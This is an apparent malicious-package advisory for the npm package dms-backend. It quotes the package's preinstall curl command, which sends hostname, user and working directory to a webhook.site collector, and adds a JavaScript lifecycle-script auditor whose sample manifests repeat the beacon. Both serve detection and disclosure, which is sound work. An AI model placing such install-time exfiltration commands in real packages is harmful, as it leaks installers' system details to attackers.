MAL-2026-5826
Malicious code in dms-backend (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (bd479ea3869dae33e183f9164c4e9c7c11a2170728288012647fe2af4d55426e)

package.json declares a preinstall lifecycle script that runs `curl --data-urlencode "info=$(hostname && whoami && pwd)"` against a webhook.site collector URL (https://webhook.site/1ea0386f-dcc0-4f1b-bdbb-61732d6535fb/dms-backend). This fires automatically on `npm install` and leaks installer-side identifiers — hostname, current OS user, and install working directory — to an attacker-controlled webhook bin. The package ships no real functionality; the preinstall recon beacon is the package's only behavior, which is the canonical shape of a dependency-confusion reconnaissance probe (the name `dms-backend` suggests targeting an internal/private registry name to hijack installs of an organization's private package).
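A defender-side check for the pattern described above, added here as an example and not taken from the advisory or from Amazon Inspector: it audits a parsed `package.json` for install-time hooks that combine a network tool, host-identifying command substitution, and an outbound URL. The function name, hook list, regexes, and sample manifests (including the `example.invalid` hosts) are assumptions constructed for illustration.

```javascript
// Added example, not from the advisory: audit a parsed package.json for
// install-time scripts that send host details to a remote URL.
// Hook list and regexes are assumptions tuned to the behaviour described above.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];
const NET_TOOLS = /\b(curl|wget|nc|ncat|nslookup|dig)\b/i;
const HOST_RECON = /\b(hostname|whoami|pwd|id|uname|ifconfig|ipconfig)\b/i;
const CMD_SUBST = /\$\([^)]*\)|`[^`]*`/g; // $(...) and backticks, non-nested
const URL_RE = /https?:\/\/[^\s"'`)]+/gi;

function auditLifecycleScripts(pkg) {
  const scripts = (pkg && typeof pkg.scripts === "object" && pkg.scripts) || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    const reasons = [];
    if (NET_TOOLS.test(cmd)) reasons.push("network-tool");
    const substitutions = cmd.match(CMD_SUBST) || [];
    if (substitutions.some((s) => HOST_RECON.test(s))) {
      reasons.push("host-recon-in-substitution");
    }
    const hosts = [];
    for (const u of cmd.match(URL_RE) || []) {
      try { hosts.push(new URL(u).hostname); } catch (_) { /* skip bad URL */ }
    }
    if (hosts.length > 0) reasons.push("outbound-url");
    // All three together is the beacon shape; fewer is only worth a review.
    if (reasons.length > 0) {
      findings.push({ hook, reasons, hosts, beacon: reasons.length === 3 });
    }
  }
  return findings;
}

// Constructed manifests; the collector and download hosts are placeholders.
const SAMPLE_BEACON = { name: "constructed-probe", version: "1.0.0", scripts: {
  preinstall: 'curl --data-urlencode "info=$(hostname && whoami && pwd)" ' +
    "https://collector.example.invalid/constructed-id/constructed-probe" } };
const SAMPLE_DOWNLOAD = { name: "constructed-fetcher", scripts: {
  postinstall: "curl -sSfL https://downloads.example.invalid/tool.tgz -o tool.tgz" } };
const SAMPLE_BENIGN = { name: "constructed-lib", scripts: {
  test: "jest", postinstall: "node build.js" } };

console.log(JSON.stringify(auditLifecycleScripts(SAMPLE_BEACON), null, 2));
```

Run it over manifests before they are installed, for example from a registry tarball unpacked in a sandbox, because the hook executes during `npm install` itself.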
Affected packages
No fixed version published yet for dms-backend (npm). Pin to a known-safe version or switch to an alternative.